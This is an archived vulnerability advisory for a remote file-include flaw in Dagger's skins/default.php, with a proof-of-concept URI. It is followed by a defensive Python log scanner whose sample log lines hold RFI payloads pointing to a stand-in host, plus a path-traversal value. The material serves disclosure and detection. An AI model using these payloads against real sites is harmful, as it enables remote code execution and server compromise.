Written by CraCkEr
Monday, 16 March 2009 21:15
Dagger 'skins/default.php' Remote File Include Vulnerability
- Bugtraq ID: 29906
- Class: Input Validation Error
- CVE:
- Remote: Yes
- Local: No
- Published: Jun 23 2008 12:00AM
- Updated: Mar 16 2009 04:06PM
- Credit: CraCkEr
- Vulnerable: Geody Labs Dagger dagger_r12feb2008
- Not Vulnerable: Geody Labs Dagger dagger_r13mar2009
- Discussion: Dagger is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying computer; other attacks are also possible.
- Exploit(s)/PoC(s): An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/path/skins/default.php?dir_inc=[SHELL]
- Solution: Vendor updates are available. Please contact the vendor for details.
  - Geody Labs Dagger dagger_r12feb2008: Geody Labs dagger_r13mar2009.zip http://downloads.sourceforge.net/dagger/dagger_r13mar2009.zip
- Reference(s):
  - Dagger Homepage http://sourceforge.net/project/showfiles.php?group_id=7997 (Geody Labs)
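Added example, not part of this advisory and not Dagger's own code: a Python script that scans web-server access-log lines for requests that pass a URL (the remote file-include pattern above) or a path-traversal sequence in the `dir_inc` parameter, plus an allow-list check of the kind a hardened skin loader would apply before including anything. The log lines, IP addresses, file names and the allow-list of skin names are constructed for the example; the advisory does not publish Dagger's source, so the allow-list check models a safe resolution of the parameter rather than the vendor's actual fix.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (common log format); not real traffic.
# Line 2 carries a plain URL, line 3 the same URL percent-encoded, line 4 a
# traversal sequence; lines 1 and 5 are benign.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Mar/2009:21:15:02 +0000] "GET /dagger/skins/default.php?dir_inc=default HTTP/1.1" 200 512
203.0.113.9 - - [16/Mar/2009:21:15:05 +0000] "GET /dagger/skins/default.php?dir_inc=http://198.51.100.5/x.txt HTTP/1.1" 200 1024
203.0.113.9 - - [16/Mar/2009:21:15:07 +0000] "GET /dagger/skins/default.php?dir_inc=%68%74%74%70%3a%2f%2f198.51.100.5%2fx.txt HTTP/1.1" 200 1024
203.0.113.11 - - [16/Mar/2009:21:16:00 +0000] "GET /dagger/skins/default.php?dir_inc=../../../../not_a_skin.txt HTTP/1.1" 200 1024
203.0.113.12 - - [16/Mar/2009:21:16:30 +0000] "GET /dagger/index.php HTTP/1.1" 200 2048
"""

# client, user-ident, user, [timestamp], "METHOD TARGET PROTO", status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) (\S+)$')

# Any URL scheme followed by "://" means the parameter names a remote resource.
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")
# A skin name that is safe to map onto a local directory: one path component,
# no separators, no dots.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")

# Assumed allow-list of installed skins; the real install would list its own.
ALLOWED_SKINS = frozenset({"default"})


def parse_request(line):
    """Return (client, path, query) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _ts, _method, target, _status, _size = m.groups()
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    return client, parts.path, query


def classify_dir_inc(value):
    """Classify a dir_inc value: 'remote', 'traversal', 'unexpected' or 'ok'."""
    # parse_qs already decoded once; decode again so a double-encoded value
    # is judged on what the application would finally see.
    decoded = unquote(value)
    if SCHEME_RE.match(decoded):
        return "remote"
    if ".." in decoded or decoded.startswith(("/", "\\")):
        return "traversal"
    if not SAFE_NAME_RE.match(decoded):
        return "unexpected"
    return "ok"


def is_allowed_skin(value):
    """Allow-list check a hardened loader would apply before any include()."""
    return bool(SAFE_NAME_RE.match(value)) and value in ALLOWED_SKINS


def find_rfi_attempts(log_text):
    """Return one record per request whose dir_inc value is not a plain skin name."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_request(line)
        if parsed is None:
            continue
        client, path, query = parsed
        for value in query.get("dir_inc", []):
            verdict = classify_dir_inc(value)
            if verdict != "ok":
                hits.append({"client": client, "path": path,
                             "value": unquote(value), "verdict": verdict})
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f"{hit['client']:<14} {hit['verdict']:<10} {hit['path']} dir_inc={hit['value']}")
```

The scanner inspects every request carrying `dir_inc`, not only `skins/default.php`, so the same rule catches the parameter if another script reuses it. On the application side, `is_allowed_skin` is the shape of the fix: resolve the parameter against a fixed set of local names and never hand a user-controlled string to `include`; keeping PHP's `allow_url_include` directive off removes the remote part of the bug class regardless of application code.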